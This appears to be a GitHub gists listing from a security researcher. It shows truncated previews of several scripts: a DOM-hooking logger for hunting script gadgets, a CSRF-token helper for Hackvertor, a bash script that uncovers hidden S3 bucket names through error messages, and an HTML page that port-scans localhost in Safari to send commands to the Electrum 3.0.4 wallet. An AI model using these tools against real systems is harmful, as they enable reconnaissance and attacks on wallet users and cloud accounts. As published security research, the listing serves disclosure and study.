Skip to content

Instantly share code, notes, and snippets.

@fransr
fransr / logger.js
Last active Nov 29, 2021
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
View logger.js
var logger = console.trace;
// ELEMENT
;(getElementByIdCopy => {
Element.prototype.getElementById = function(q) {
logger('getElementById', q, this, this.innerHTML);
return Reflect.apply(getElementByIdCopy, this, [q])
}
})(Element.prototype.getElementById)
@fransr
fransr / customcsrf.py
Created Feb 16, 2021
Hackvertor Custom CSRF tag
View customcsrf.py
import httplib
import urllib
http = httplib.HTTPSConnection('example.com', 443)
cookie = 'your=cookies';
http.request("GET", "/api/v1/csrf", "", {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36',
'referer': 'https://example.com/',
@fransr
fransr / bucket-disclose.sh
Last active Jun 28, 2022
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
View bucket-disclose.sh
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@fransr
fransr / electrum.html
Last active Nov 30, 2021
Simple port-scan using embed+onerror in Safari to send gui-commands to Electrum 3.0.4 without the need of any CORS-headers
View electrum.html
<body>
<style>pre { white-space: inherit }</style>
<pre id="log"></pre>
<div id="ports" style="visibility: hidden; height: 0; width: 0;"></div>
<iframe src="about:blank" name="x" id="x" style="display: none;"></iframe>
</body>
<script>
var electrum = {
logbreak: function() { e = document.createElement('br'); document.getElementById('log').appendChild(e); },
log: function(s) { e = document.createElement('span'); e.innerText = s+" "; document.getElementById('log').appendChild(e); },
@fransr
fransr / gist:db901674466ec5d9fe2e73da6c79818b
Created Aug 10, 2017
Chinese whispers bookmarklet using Google Translate
View gist:db901674466ec5d9fe2e73da6c79818b
javascript:(function(){function $(i,b){b=(b?b:document);return b.getElementById(i.substr(1))};var i=location.hash.substr(1).split('/')[0]||'en',a=JSON.stringify(NND).match(/[a-zA-Z-]+/g),o=i,x,p,c=0,j=$,e=0;if(i=='auto')i='en';a=[...new Set(a)],d=[i,'or','ug','tt','tk','mg','lo','rw','si','zh'];function n(v) {c++;var l=a.pop();while(l==o||d.find(function(ee){return ee==l}))l=a.pop();if(!l||c>100){if(e){j('#result_box').innerText=v;x.close();return;}else{l=i;e=1;}};console.log(o,l,v);x=window.open(location.href.split('#')[0]+'?'+Math.random()+'#'+o+'/'+l+'/'+v.replace(/ /g,'%20'),'x');o=l;p=setInterval(q,500);}function q(){if(!j('#result_box',x.document)||!j('#result_box',x.document).innerText||!j('#result_box',x.document).innerText.length)return;clearInterval(p);txt=j('#result_box',x.document).innerText;n(txt);}n(j('#source').value);})()
View keybase.md

Keybase proof

I hereby claim:

  • I am fransr on github.
  • I am frans (https://keybase.io/frans) on keybase.
  • I have a public key whose fingerprint is C999 46C3 C7B8 A275 7FD2 8B6F 8D76 6CC3 6F62 00D9

To claim this, I am signing this object: